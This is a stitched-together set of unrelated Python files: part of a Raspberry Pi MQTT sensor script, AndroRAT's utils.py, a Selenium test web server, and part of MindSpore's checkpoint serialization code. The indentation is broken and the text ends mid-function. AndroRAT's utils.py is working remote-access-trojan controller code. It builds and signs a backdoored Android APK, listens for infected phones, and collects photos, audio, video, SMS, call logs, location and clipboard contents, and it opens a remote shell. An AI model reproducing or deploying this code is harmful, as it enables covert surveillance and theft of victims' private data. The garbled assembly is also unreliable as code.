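# Illustrative sketch of a matching subscriber: it listens to the topics
# published by the threads above (gyro/#, baro/#, therm/#) on the same local
# broker (127.0.0.1:1883). It is not called by this script.
def example_subscriber():
    def _on_connect(client, userdata, flags, rc):
        client.subscribe([('gyro/#', 0), ('baro/#', 0), ('therm/#', 0)])
    def _on_message(client, userdata, msg):
        print(msg.topic, msg.payload.decode())
    subscriber = mqtt.Client()
    subscriber.on_connect = _on_connect
    subscriber.on_message = _on_message
    subscriber.connect("127.0.0.1", 1883, 60)
    subscriber.loop_forever()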
if __name__ == '__main__':
    ##############################################
    # 0. Initialization of the various components
    ##############################################
    # - GPIOs
    # - InfluxDB database
    # - gyroscope
    # - barometer
    # - thermometer
    logging.debug('Initialisation du programme')
    # Sensor initialization
MotionVal = [0.0 for _ in range(0,9)]
icm20948 = ICM20948() # Gyroscope
    lps22hb = LPS22HB() # Pressure/temperature
    i2c = busio.I2C(board.SCL, board.SDA)
    shtc3 = adafruit_shtc3.SHTC3(i2c) # Temperature/humidity
logging.info('Capteurs initialisés')
# Client MQTT
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.on_publish = on_publish
client.connect("127.0.0.1", 1883, 60)
client.loop_start()
logging.info(f'MQTT, connexions au serveur établie')
    ##############################################
    # 1. Starting the threads
    ##############################################
    # - barometer listener
    # - thermometer listener
    # - gyroscope listener
    stop_thread = lambda : user_signal
    # Sensor listeners: one thread per sensor (thread_gyro, thread_baro, thread_therm)
threads_capteurs = []
for capteur in zip([icm20948, lps22hb, shtc3], ['Gyroscope', 'Baromètre', 'Thermomètre'], [thread_gyro, thread_baro, thread_therm]):
threadObj = threading.Thread( target=capteur[2], args=(stop_thread, client, capteur[0]), name=capteur[1] )
threads_capteurs.append(threadObj)
threadObj.start()
logging.info(f'Thread {capteur[1]} démarré')
    ##############################################
    # 2. Thread supervision
    ##############################################
    # - Permanent loop supervising the sensor threads
    while user_signal:
        try:
            time.sleep(1) # check once per second
            for thr in threads_capteurs:
                if not thr.is_alive():
                    message = '[{}] {} {}'.format(time.ctime(), thr.name, thr.is_alive())
                    logging.warning(message)
        except (KeyboardInterrupt, SystemExit): # when you press ctrl+c
            user_signal = False
            logging.info("Done.\nExiting.")
    logging.info('Going to shut down now...')
|
utils.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import os
import base64
import time
import binascii
import select
import pathlib
import platform
import re
from subprocess import PIPE, run
from colorama import Fore, Style,init
from pyngrok import ngrok
import socket
import threading
import itertools
import queue
banner = """\033[1m\033[91m
_ _____ _______
/\ | | | __ \ /\|__ __|
/ \ _ __ __| |_ __ ___ | |__) | / \ | |
/ /\ \ | '_ \ / _` | '__/ _ \| _ / / /\ \ | |
/ ____ \| | | | (_| | | | (_) | | \ \ / ____ \| |
/_/ \_\_| |_|\__,_|_| \___/|_| \_\/_/ \_\_|
\033[93m- By karma9874
"""
pattern = '\"(\\d+\\.\\d+).*\"'
def stdOutput(type_=None):
if type_=="error":col="31m";str="ERROR"
if type_=="warning":col="33m";str="WARNING"
if type_=="success":col="32m";str="SUCCESS"
if type_ == "info":return "\033[1m[\033[33m\033[0m\033[1m\033[33mINFO\033[0m\033[1m] "
message = "\033[1m[\033[31m\033[0m\033[1m\033["+col+str+"\033[0m\033[1m]\033[0m "
return message
def animate(message):
chars = "/—\\|"
for char in chars:
sys.stdout.write("\r"+stdOutput("info")+"\033[1m"+message+"\033[31m"+char+"\033[0m")
time.sleep(.1)
sys.stdout.flush()
def clearDirec():
if(platform.system() == 'Windows'):
clear = lambda: os.system('cls')
direc = "\\"
init(convert=True)
else:
clear = lambda: os.system('clear')
direc = "/"
return clear,direc
clear,direc = clearDirec()
if not os.path.isdir(os.getcwd()+direc+"Dumps"):
os.makedirs("Dumps")
def is_valid_ip(ip):
m = re.match(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$", ip)
return bool(m) and all(map(lambda n: 0 <= int(n) <= 255, m.groups()))
def is_valid_port(port):
i = 1 if port.isdigit() and len(port)>1 else 0
return i
def execute(command):
return run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True)
def executeCMD(command,queue):
result = run(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, shell=True)
queue.put(result)
return result
def getpwd(name):
return os.getcwd()+direc+name;
def help():
helper="""
Usage:
deviceInfo --> returns basic info of the device
camList --> returns cameraID
takepic [cameraID] --> Takes picture from camera
startVideo [cameraID] --> starts recording the video
stopVideo --> stop recording the video and return the video file
startAudio --> starts recording the audio
stopAudio --> stop recording the audio
getSMS [inbox|sent] --> returns inbox sms or sent sms in a file
getCallLogs --> returns call logs in a file
shell --> starts a interactive shell of the device
vibrate [number_of_times] --> vibrate the device number of time
getLocation --> return the current location of the device
getIP --> returns the ip of the device
getSimDetails --> returns the details of all sim of the device
clear --> clears the screen
getClipData --> return the current saved text from the clipboard
getMACAddress --> returns the mac address of the device
exit --> exit the interpreter
"""
print(helper)
def getImage(client):
print(stdOutput("info")+"\033[0mTaking Image")
timestr = time.strftime("%Y%m%d-%H%M%S")
flag=0
filename ="Dumps"+direc+"Image_"+timestr+'.jpg'
imageBuffer=recvall(client)
imageBuffer = imageBuffer.strip().replace("END123","").strip()
if imageBuffer=="":
print(stdOutput("error")+"Unable to connect to the Camera\n")
return
with open(filename,'wb') as img:
try:
imgdata = base64.b64decode(imageBuffer)
img.write(imgdata)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename)+"\n")
except binascii.Error as e:
flag=1
print(stdOutput("error")+"Not able to decode the Image\n")
if flag == 1:
os.remove(filename)
def readSMS(client,data):
print(stdOutput("info")+"\033[0mGetting "+data+" SMS")
msg = "start"
timestr = time.strftime("%Y%m%d-%H%M%S")
filename = "Dumps"+direc+data+"_"+timestr+'.txt'
flag =0
with open(filename, 'w',errors="ignore", encoding="utf-8") as txt:
msg = recvall(client)
try:
txt.write(msg)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename)+"\n")
except UnicodeDecodeError:
flag = 1
print(stdOutput("error")+"Unable to decode the SMS\n")
if flag == 1:
os.remove(filename)
def getFile(filename,ext,data):
fileData = "Dumps"+direc+filename+"."+ext
flag=0
with open(fileData, 'wb') as file:
try:
rawFile = base64.b64decode(data)
file.write(rawFile)
print(stdOutput("success")+"Succesfully Downloaded in \033[1m\033[32m"+getpwd(fileData)+"\n")
except binascii.Error:
flag=1
print(stdOutput("error")+"Not able to decode the Audio File")
if flag == 1:
os.remove(filename)
def putFile(filename):
data = open(filename, "rb").read()
encoded = base64.b64encode(data)
return encoded
def shell(client):
msg = "start"
command = "ad"
while True:
msg = recvallShell(client)
if "getFile" in msg:
msg=" "
msg1 = recvall(client)
msg1 = msg1.replace("\nEND123\n","")
filedata = msg1.split("|_|")
getFile(filedata[0],filedata[1],filedata[2])
if "putFile" in msg:
msg=" "
sendingData=""
filename = command.split(" ")[1].strip()
file = pathlib.Path(filename)
if file.exists():
encoded_data = putFile(filename).decode("UTF-8")
filedata = filename.split(".")
sendingData+="putFile"+"<"+filedata[0]+"<"+filedata[1]+"<"+encoded_data+"END123\n"
client.send(sendingData.encode("UTF-8"))
print(stdOutput("success")+f"Succesfully Uploaded the file \033[32m{filedata[0]+'.'+filedata[1]} in /sdcard/temp/")
else:
print(stdOutput("error")+"File not exist")
if "Exiting" in msg:
print("\033[1m\033[33m----------Exiting Shell----------\n")
return
msg = msg.split("\n")
for i in msg[:-2]:
print(i)
print(" ")
command = input("\033[1m\033[36mandroid@shell:~$\033[0m \033[1m")
command = command+"\n"
if command.strip() == "clear":
client.send("test\n".encode("UTF-8"))
clear()
else:
client.send(command.encode("UTF-8"))
def getLocation(sock):
msg = "start"
while True:
msg = recvall(sock)
msg = msg.split("\n")
for i in msg[:-2]:
print(i)
if("END123" in msg):
return
print(" ")
def recvall(sock):
buff=""
data = ""
while "END123" not in data:
data = sock.recv(4096).decode("UTF-8","ignore")
buff+=data
return buff
def recvallShell(sock):
buff=""
data = ""
ready = select.select([sock], [], [], 3)
while "END123" not in data:
if ready[0]:
data = sock.recv(4096).decode("UTF-8","ignore")
buff+=data
else:
buff="bogus"
return buff
return buff
def stopAudio(client):
print(stdOutput("info")+"\033[0mDownloading Audio")
timestr = time.strftime("%Y%m%d-%H%M%S")
data= ""
flag =0
data=recvall(client)
data = data.strip().replace("END123","").strip()
filename = "Dumps"+direc+"Audio_"+timestr+".mp3"
with open(filename, 'wb') as audio:
try:
audioData = base64.b64decode(data)
audio.write(audioData)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename))
except binascii.Error:
flag=1
print(stdOutput("error")+"Not able to decode the Audio File")
print(" ")
if flag == 1:
os.remove(filename)
def stopVideo(client):
print(stdOutput("info")+"\033[0mDownloading Video")
timestr = time.strftime("%Y%m%d-%H%M%S")
data= ""
flag=0
data=recvall(client)
data = data.strip().replace("END123","").strip()
filename = "Dumps"+direc+"Video_"+timestr+'.mp4'
with open(filename, 'wb') as video:
try:
videoData = base64.b64decode(data)
video.write(videoData)
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename))
except binascii.Error:
flag = 1
print(stdOutput("error")+"Not able to decode the Video File\n")
if flag == 1:
os.remove("Video_"+timestr+'.mp4')
def callLogs(client):
print(stdOutput("info")+"\033[0mGetting Call Logs")
msg = "start"
timestr = time.strftime("%Y%m%d-%H%M%S")
msg = recvall(client)
filename = "Dumps"+direc+"Call_Logs_"+timestr+'.txt'
if "No call logs" in msg:
msg.split("\n")
print(msg.replace("END123","").strip())
print(" ")
else:
with open(filename, 'w',errors="ignore", encoding="utf-8") as txt:
txt.write(msg)
txt.close()
print(stdOutput("success")+"Succesfully Saved in \033[1m\033[32m"+getpwd(filename)+"\033[0m")
if not os.path.getsize(filename):
os.remove(filename)
def get_shell(ip,port):
    soc = socket.socket(type=socket.SOCK_STREAM)
try:
# Restart the TCP server on exit
soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
soc.bind((ip, int(port)))
except Exception as e:
print(stdOutput("error")+"\033[1m %s"%e);exit()
soc.listen(2)
print(banner)
while True:
que = queue.Queue()
t = threading.Thread(target=connection_checker,args=[soc,que])
t.daemon = True
t.start()
while t.is_alive(): animate("Waiting for Connections ")
t.join()
conn, addr = que.get()
clear()
print("\033[1m\033[33mGot connection from \033[31m"+"".join(str(addr))+"\033[0m")
print(" ")
while True:
msg = conn.recv(4024).decode("UTF-8")
if(msg.strip() == "IMAGE"):
getImage(conn)
elif("readSMS" in msg.strip()):
content = msg.strip().split(" ")
data = content[1]
readSMS(conn,data)
elif(msg.strip() == "SHELL"):
shell(conn)
elif(msg.strip() == "getLocation"):
getLocation(conn)
elif(msg.strip() == "stopVideo123"):
stopVideo(conn)
elif(msg.strip() == "stopAudio"):
stopAudio(conn)
elif(msg.strip() == "callLogs"):
callLogs(conn)
elif(msg.strip() == "help"):
help()
else:
print(stdOutput("error")+msg) if "Unknown Command" in msg else print("\033[1m"+msg) if "Hello there" in msg else print(msg)
message_to_send = input("\033[1m\033[36mInterpreter:/> \033[0m")+"\n"
conn.send(message_to_send.encode("UTF-8"))
if message_to_send.strip() == "exit":
print(" ")
print("\033[1m\033[32m\t (∗ ・‿・)ノ゛\033[0m")
sys.exit()
if(message_to_send.strip() == "clear"):clear()
def connection_checker(socket,queue):
conn, addr = socket.accept()
queue.put([conn,addr])
return conn,addr
def build(ip,port,output,ngrok=False,ng=None,icon=None):
editor = "Compiled_apk"+direc+"smali"+direc+"com"+direc+"example"+direc+"reverseshell2"+direc+"config.smali"
try:
file = open(editor,"r").readlines()
        # Very hacky (hard-coded line numbers), but can't think of any other way to do it
file[18]=file[18][:21]+"\""+ip+"\""+"\n"
file[23]=file[23][:21]+"\""+port+"\""+"\n"
file[28]=file[28][:15]+" 0x0"+"\n" if icon else file[28][:15]+" 0x1"+"\n"
str_file="".join([str(elem) for elem in file])
open(editor,"w").write(str_file)
except Exception as e:
print(e)
sys.exit()
java_version = execute("java -version")
if java_version.returncode: print(stdOutput("error")+"Java Not Installed");exit()
#version_no = re.search(pattern, java_version.stderr).groups()[0]
# if float(version_no) > 1.8: print(stdOutput("error")+"Java 8 is required, Java version found "+version_no);exit()
print(stdOutput("info")+"\033[0mGenerating APK")
outFileName = output if output else "karma.apk"
que = queue.Queue()
t = threading.Thread(target=executeCMD,args=["java -jar Jar_utils/apktool.jar b Compiled_apk -o "+outFileName,que],)
t.start()
while t.is_alive(): animate("Building APK ")
t.join()
print(" ")
resOut = que.get()
if not resOut.returncode:
print(stdOutput("success")+"Successfully apk built in \033[1m\033[32m"+getpwd(outFileName)+"\033[0m")
print(stdOutput("info")+"\033[0mSigning the apk")
t = threading.Thread(target=executeCMD,args=["java -jar Jar_utils/sign.jar -a "+outFileName+" --overwrite",que],)
t.start()
while t.is_alive(): animate("Signing Apk ")
t.join()
print(" ")
resOut = que.get()
if not resOut.returncode:
print(stdOutput("success")+"Successfully signed the apk \033[1m\033[32m"+outFileName+"\033[0m")
if ngrok:
clear()
get_shell("0.0.0.0",8000) if not ng else get_shell("0.0.0.0",ng)
print(" ")
else:
print("\r"+resOut.stderr)
print(stdOutput("error")+"Signing Failed")
else:
print("\r"+resOut.stderr)
print(stdOutput("error")+"Building Failed")
|
webserver.py
|
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""A simple web server for testing purpose.
It serves the testing html pages that are needed by the webdriver unit tests."""
import logging
import os
import socket
import threading
from io import open
try:
from urllib import request as urllib_request
except ImportError:
import urllib as urllib_request
try:
from http.server import BaseHTTPRequestHandler, HTTPServer
except ImportError:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
def updir():
dirname = os.path.dirname
return dirname(dirname(__file__))
LOGGER = logging.getLogger(__name__)
WEBDRIVER = os.environ.get("WEBDRIVER", updir())
HTML_ROOT = os.path.join(WEBDRIVER, "../../../../../../common/src/web")
if not os.path.isdir(HTML_ROOT):
message = ("Can't find 'common_web' directory, try setting WEBDRIVER"
" environment variable WEBDRIVER:" + WEBDRIVER + " HTML_ROOT:" + HTML_ROOT )
LOGGER.error(message)
assert 0, message
DEFAULT_HOST = "127.0.0.1"
DEFAULT_PORT = 8000
class HtmlOnlyHandler(BaseHTTPRequestHandler):
"""Http handler."""
def do_GET(self):
"""GET method handler."""
try:
path = self.path[1:].split('?')[0]
html = open(os.path.join(HTML_ROOT, path), 'r', encoding='latin-1')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(html.read().encode('utf-8'))
html.close()
except IOError:
self.send_error(404, 'File Not Found: %s' % path)
def log_message(self, format, *args):
"""Override default to avoid trashing stderr"""
pass
class SimpleWebServer(object):
"""A very basic web server."""
def __init__(self, host=DEFAULT_HOST, port=DEFAULT_PORT):
self.stop_serving = False
while True:
try:
self.server = HTTPServer(
(host, port), HtmlOnlyHandler)
self.host = host
self.port = port
break
except socket.error:
LOGGER.debug("port %d is in use, trying to next one"
% port)
port += 1
self.thread = threading.Thread(target=self._run_web_server)
def _run_web_server(self):
"""Runs the server loop."""
LOGGER.debug("web server started")
while not self.stop_serving:
self.server.handle_request()
self.server.server_close()
def start(self):
"""Starts the server."""
self.thread.start()
def stop(self):
"""Stops the server."""
self.stop_serving = True
try:
# This is to force stop the server loop
urllib_request.URLopener().open("http://%s:%d" % (self.host,self.port))
except IOError:
pass
LOGGER.info("Shutting down the webserver")
self.thread.join()
def where_is(self, path):
return "http://%s:%d/%s" % (self.host, self.port, path)
def main(argv=None):
from optparse import OptionParser
from time import sleep
if argv is None:
import sys
argv = sys.argv
parser = OptionParser("%prog [options]")
parser.add_option("-p", "--port", dest="port", type="int",
help="port to listen (default: %s)" % DEFAULT_PORT,
default=DEFAULT_PORT)
opts, args = parser.parse_args(argv[1:])
if args:
parser.error("wrong number of arguments") # Will exit
    server = SimpleWebServer(port=opts.port)
server.start()
print("Server started on port %s, hit CTRL-C to quit" % opts.port)
try:
while 1:
sleep(0.1)
except KeyboardInterrupt:
pass
if __name__ == "__main__":
main()
|
serialization.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Model and parameters serialization."""
import os
import stat
import math
from threading import Thread, Lock
import numpy as np
import mindspore.nn as nn
from mindspore import log as logger
from mindspore.train.checkpoint_pb2 import Checkpoint
from mindspore.train.print_pb2 import Print
from mindspore.common.tensor import Tensor
from mindspore.common.initializer import initializer
from mindspore.common.parameter import Parameter
from mindspore.common.api import _executor
from mindspore.common import dtype as mstype
from mindspore._checkparam import check_input_data
__all__ = ["save_checkpoint", "load_checkpoint", "load_param_into_net", "export", "parse_print"]
tensor_to_ms_type = {"Int8": mstype.int8, "Uint8": mstype.uint8, "Int16": mstype.int16, "Uint16": mstype.uint16,
"Int32": mstype.int32, "Uint32": mstype.uint32, "Int64": mstype.int64, "Uint64": mstype.uint64,
"Float16": mstype.float16, "Float32": mstype.float32, "Float64": mstype.float64,
"Bool": mstype.bool_}
tensor_to_np_type = {"Int8": np.int8, "Uint8": np.uint8, "Int16": np.int16, "Uint16": np.uint16,
"Int32": np.int32, "Uint32": np.uint32, "Int64": np.int64, "Uint64": np.uint64,
"Float16": np.float16, "Float32": np.float32, "Float64": np.float64, "Bool": np.bool_}
_ckpt_mutex = Lock()
SLICE_SIZE = 512 * 1024 * 1024
def _special_process_par(par, new_par):
"""
    Handles the special case where shapes differ only by trailing singleton dimensions.
    For example (12, 2048, 1, 1) -> (12, 2048); this case is caused by GE's 4-dimensional tensors.
"""
par_shape_len = len(par.data.shape)
new_par_shape_len = len(new_par.data.shape)
delta_len = new_par_shape_len - par_shape_len
delta_i = 0
for delta_i in range(delta_len):
if new_par.data.shape[par_shape_len + delta_i] != 1:
break
if delta_i == delta_len - 1:
new_val = new_par.data.asnumpy()
new_val = new_val.reshape(par.data.shape)
par.set_parameter_data(Tensor(new_val, par.data.dtype))
return True
return False
def _update_param(param, new_param):
"""Updates param's data from new_param's data."""
if isinstance(param.data, Tensor) and isinstance(new_param.data, Tensor):
if param.data.dtype != new_param.data.dtype:
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, param.data.dtype, new_param.data.dtype))
raise RuntimeError(msg)
if param.data.shape != new_param.data.shape:
if not _special_process_par(param, new_param):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) different from parameter_dict's({})"
.format(param.name, param.data.shape, new_param.data.shape))
raise RuntimeError(msg)
return
param.set_parameter_data(new_param.data)
return
if isinstance(param.data, Tensor) and not isinstance(new_param.data, Tensor):
if param.data.shape != (1,) and param.data.shape != ():
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} shape({}) is not (1,), inconsitent with parameter_dict's(scalar)."
.format(param.name, param.data.shape))
raise RuntimeError(msg)
param.set_parameter_data(initializer(new_param.data, param.data.shape, param.data.dtype))
elif isinstance(new_param.data, Tensor) and not isinstance(param.data, Tensor):
logger.error("Failed to combine the net and the parameters for param %s.", param.name)
msg = ("Net parameters {} type({}) different from parameter_dict's({})"
.format(param.name, type(param.data), type(new_param.data)))
raise RuntimeError(msg)
else:
param.set_parameter_data(type(param.data)(new_param.data))
def _exec_save(ckpt_file_name, data_list):
"""Execute save checkpoint into file process."""
try:
with _ckpt_mutex:
if os.path.exists(ckpt_file_name):
os.remove(ckpt_file_name)
with open(ckpt_file_name, "ab") as f:
for name, value in data_list.items():
data_size = value[2].nbytes
if data_size > SLICE_SIZE:
slice_count = math.ceil(data_size / SLICE_SIZE)
param_slice_list = np.array_split(value[2], slice_count)
else:
param_slice_list = [value[2]]
for param_slice in param_slice_list:
checkpoint_list = Checkpoint()
param_value = checkpoint_list.value.add()
param_value.tag = name
param_tensor = param_value.tensor
param_tensor.dims.extend(value[0])
param_tensor.tensor_type = value[1]
param_tensor.tensor_content = param_slice.tostring()
f.write(checkpoint_list.SerializeToString())
os.chmod(ckpt_file_name, stat.S_IRUSR)
except BaseException as e:
logger.error("Failed to save the checkpoint file %s.", ckpt_file_name)
raise RuntimeError(e.__str__())
def save_checkpoint(parameter_list, ckpt_file_name, async_save=False):
"""
Saves checkpoint info to a specified file.
Args:
parameter_list (list): Parameters list, each element is a dict
like {"name":xx, "type":xx, "shape":xx, "data":xx}.
ckpt_file_name (str): Checkpoint file name.
        async_save (bool): Whether to save the checkpoint file asynchronously. Default: False.
Raises:
RuntimeError: Failed to save the Checkpoint file.
"""
logger.info("Execute save checkpoint process.")
data_list = {}
with _ckpt_mutex:
for param in parameter_list:
key = param["name"]
data_list[key] = []
if isinstance(param["data"], Parameter):
param["data"].init_data()
dims = []
if param['data'].shape == ():
dims.append(0)
else:
for dim in param['data'].shape:
dims.append(dim)
data_list[key].append(dims)
tensor_type = str(param["data"].dtype)
data_list[key].append(tensor_type)
data = param["data"].asnumpy().reshape(-1)
data_list[key].append(data)
if async_save:
thr = Thread(target=_exec_save, args=(ckpt_file_name, data_list), name="asyn_save_ckpt")
thr.start()
else:
_exec_save(ckpt_file_name, data_list)
logger.info("Save checkpoint process finish.")
def load_checkpoint(ckpt_file_name, net=None):
"""
Loads checkpoint info from a specified file.
Args:
ckpt_file_name (str): Checkpoint file name.
net (Cell): Cell network. Default: None
Returns:
Dict, key is parameter name, value is a Parameter.
Raises:
ValueError: Checkpoint file is incorrect.
"""
if not isinstance(ckpt_file_name, str):
raise ValueError("The ckpt_file_name must be string.")
if not os.path.exists(ckpt_file_name):
raise ValueError("The checkpoint file is not exist.")
if ckpt_file_name[-5:] != ".ckpt":
raise ValueError("Please input the correct checkpoint file name.")
if os.path.getsize(ckpt_file_name) == 0:
raise ValueError("The checkpoint file may be empty, please make sure enter the correct file name.")
logger.info("Execute load checkpoint process.")
checkpoint_list = Checkpoint()
try:
with open(ckpt_file_name, "rb") as f:
pb_content = f.read()
checkpoint_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the checkpoint file `%s`, please check the correct of the file.", ckpt_file_name)
raise ValueError(e.__str__())
parameter_dict = {}
try:
element_id = 0
param_data_list = []
for element in checkpoint_list.value:
data = element.tensor.tensor_content
data_type = element.tensor.tensor_type
np_type = tensor_to_np_type[data_type]
ms_type = tensor_to_ms_type[data_type]
element_data = np.frombuffer(data, np_type)
param_data_list.append(element_data)
if (element_id == len(checkpoint_list.value) - 1) or \
(element.tag != checkpoint_list.value[element_id + 1].tag):
param_data = np.concatenate((param_data_list), axis=0)
param_data_list.clear()
dims = element.tensor.dims
if dims == [0]:
if 'Float' in data_type:
param_data = float(param_data[0])
elif 'Int' in data_type:
param_data = int(param_data[0])
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
elif dims == [1]:
parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
else:
param_dim = []
for dim in dims:
param_dim.append(dim)
param_value = param_data.reshape(param_dim)
parameter_dict[element.tag] = Parameter(Tensor(param_value, ms_type), name=element.tag)
element_id += 1
logger.info("Load checkpoint process finish.")
except BaseException as e:
logger.error("Failed to load the checkpoint file `%s`.", ckpt_file_name)
raise RuntimeError(e.__str__())
if net is not None:
load_param_into_net(net, parameter_dict)
return parameter_dict
def load_param_into_net(net, parameter_dict):
"""
Loads parameters into network.
Args:
net (Cell): Cell network.
parameter_dict (dict): Parameter dict.
Raises:
TypeError: Argument is not a Cell, or parameter_dict is not a Parameter dict.
"""
if not isinstance(net, nn.Cell):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument net should be a Cell, but got {}.".format(type(net)))
raise TypeError(msg)
if not isinstance(parameter_dict, dict):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict should be a dict, but got {}.".format(type(parameter_dict)))
raise TypeError(msg)
logger.info("Execute load parameter into net process.")
net.init_parameters_data()
param_not_load = []
for _, param in net.parameters_and_names():
if param.name in parameter_dict:
new_param = parameter_dict[param.name]
if not isinstance(new_param, Parameter):
logger.error("Failed to combine the net and the parameters.")
msg = ("Argument parameter_dict element should be a Parameter, but got {}.".format(type(new_param)))
raise TypeError(msg)
_update_param(param, new_param)
else:
param_not_load.append(param.name)
if param_not_load:
_load_dismatch_prefix_params(net, parameter_dict, param_not_load)
logger.debug("Params not matched(in net but not in parameter_dict):")
for param_name in param_not_load:
logger.debug("%s", param_name)
logger.info("Load parameter into net finish, {} parameters has not been loaded.".format(len(param_not_load)))
def _load_dismatch_prefix_params(net, parameter_dict, param_not_load):
"""When some net parameter did not load, try to continue load."""
prefix_name = ""
longest_name = param_not_load[0]
while prefix_name != longest_name and param_not_load:
logger.debug("Count: {} parameters has not been loaded, try to load continue.".format(len(param_not_load)))
prefix_name = longest_name
for net_param_name in param_not_load:
for dict_name in parameter_dict:
if dict_name.endswith(net_param_name):
prefix_name = dict_name[:-len(net_param_name)]
break
if prefix_name != longest_name:
break
if prefix_name != longest_name:
logger.warning("Remove parameter prefix name: {}, continue to load.".format(prefix_name))
for _, param in net.parameters_and_names():
new_param_name = prefix_name + param.name
if param.name in param_not_load and new_param_name in parameter_dict:
new_param = parameter_dict[new_param_name]
_update_param(param, new_param)
param_not_load.remove(param.name)
def _save_graph(network, file_name):
"""
Saves the graph of network to a file.
Args:
network (Cell): Obtain a pipeline through network for saving graph.
file_name (str): Graph file name into which the graph will be saved.
"""
logger.info("Execute save the graph process.")
graph_proto = network.get_func_graph_proto()
if graph_proto:
with open(file_name, "wb") as f:
f.write(graph_proto)
os.chmod(file_name, stat.S_IRUSR)
def _exec_save_checkpoint(train_network, ckpt_file_name, integrated_save=True, async_save=False):
"""
Saves checkpoint for 'ms' backend.
Args:
train_network (Network): The train network for training.
ckpt_file_name (str): The name of checkpoint file.
        integrated_save (bool): Whether to merge and save parameters that are split across devices
            in the automatic model parallel scenario.
        async_save (bool): Whether to save the checkpoint file asynchronously. Default: False.
"""
train_network.init_parameters_data()
param_dict = {}
for _, param in train_network.parameters_and_names():
param_dict[param.name] = param
param_list = []
for (key, value) in param_dict.items():
each_param = {"name": key}
if isinstance(value.data, Tensor):
param_data = value.data
else:
param_data = Tensor(value.data)
        # in the automatic model parallel scenario, some parameters were split across all the devices
        # and should be combined before saving
if integrated_save and key in train_network.parameter_layout_dict:
param_data = _get_merged_param_data(train_network, key, param_data)
each_param["data"] = param_data
param_list.append(each_param)
save_checkpoint(param_list, ckpt_file_name, async_save)
def _get_merged_param_data(net, param_name, param_data):
"""
Gets the merged data(tensor) from tensor slice, by device arrangement and tensor map.
Args:
net (Cell): MindSpore network.
        param_name (str): The name of the parameter to be combined.
        param_data (Tensor): The parameter data on the local device;
            it is a slice of the whole parameter data.
    Returns:
        Tensor, the combined tensor containing the whole data value.
"""
    layout = net.parameter_layout_dict[param_name]
if len(layout) < 2:
logger.info("layout dict does not contain the key %s", param_name)
return param_data
dev_mat = layout[0]
tensor_map = layout[1]
field_size = layout[3]
from mindspore.parallel._cell_wrapper import get_allgather_cell
from mindspore.parallel._tensor import _reshape_param_data, _reshape_param_data_with_weight
    # if any dim is not equal to -1, the param is split and needs to be merged
for dim in tensor_map:
if dim != -1:
allgather_net = get_allgather_cell()
param_data = allgather_net(param_data)
if field_size[0]:
return _reshape_param_data_with_weight(param_data, dev_mat, field_size)
return _reshape_param_data(param_data, dev_mat, tensor_map)
return param_data
def _fill_param_into_net(net, parameter_list):
"""
Fills parameter_list into net.
Args:
net (Cell): train network.
parameter_list (list): parameters list from ge callback.
"""
parameter_dict = {}
for each_param in parameter_list:
param_name = each_param["name"]
if isinstance(each_param["data"], Parameter):
each_param["data"].init_data()
np_val = each_param["data"].asnumpy()
if np_val.shape == (1,):
parameter_dict[param_name] = Parameter(np_val, name=param_name)
elif np_val.shape == ():
parameter_dict[param_name] = Parameter(Tensor(np_val.tolist(), mstype.pytype_to_dtype(np_val.dtype)),
name=param_name)
else:
parameter_dict[param_name] = Parameter(Tensor(np_val), name=param_name)
load_param_into_net(net, parameter_dict)
def export(net, *inputs, file_name, file_format='GEIR'):
"""
Exports MindSpore predict model to file in specified format.
Args:
net (Cell): MindSpore network.
inputs (Tensor): Inputs of the `net`.
file_name (str): File name of model to export.
file_format (str): MindSpore currently supports 'GEIR', 'ONNX' and 'BINARY' format for exported model.
            - GEIR: Graph Engine Intermediate Representation. An intermediate representation format of
                Ascend model.
            - ONNX: Open Neural Network eXchange. An open format built to represent machine learning models.
            - BINARY: Binary format for model. An intermediate representation format for models.
"""
logger.info("exporting model file:%s format:%s.", file_name, file_format)
check_input_data(*inputs, data_class=Tensor)
supported_formats = ['GEIR', 'ONNX', 'BINARY']
if file_format not in supported_formats:
raise ValueError(f'Illegal file format {file_format}, it must be one of {supported_formats}')
# switch network mode to infer when it is training
is_training = net.training
if is_training:
net.set_train(mode=False)
# export model
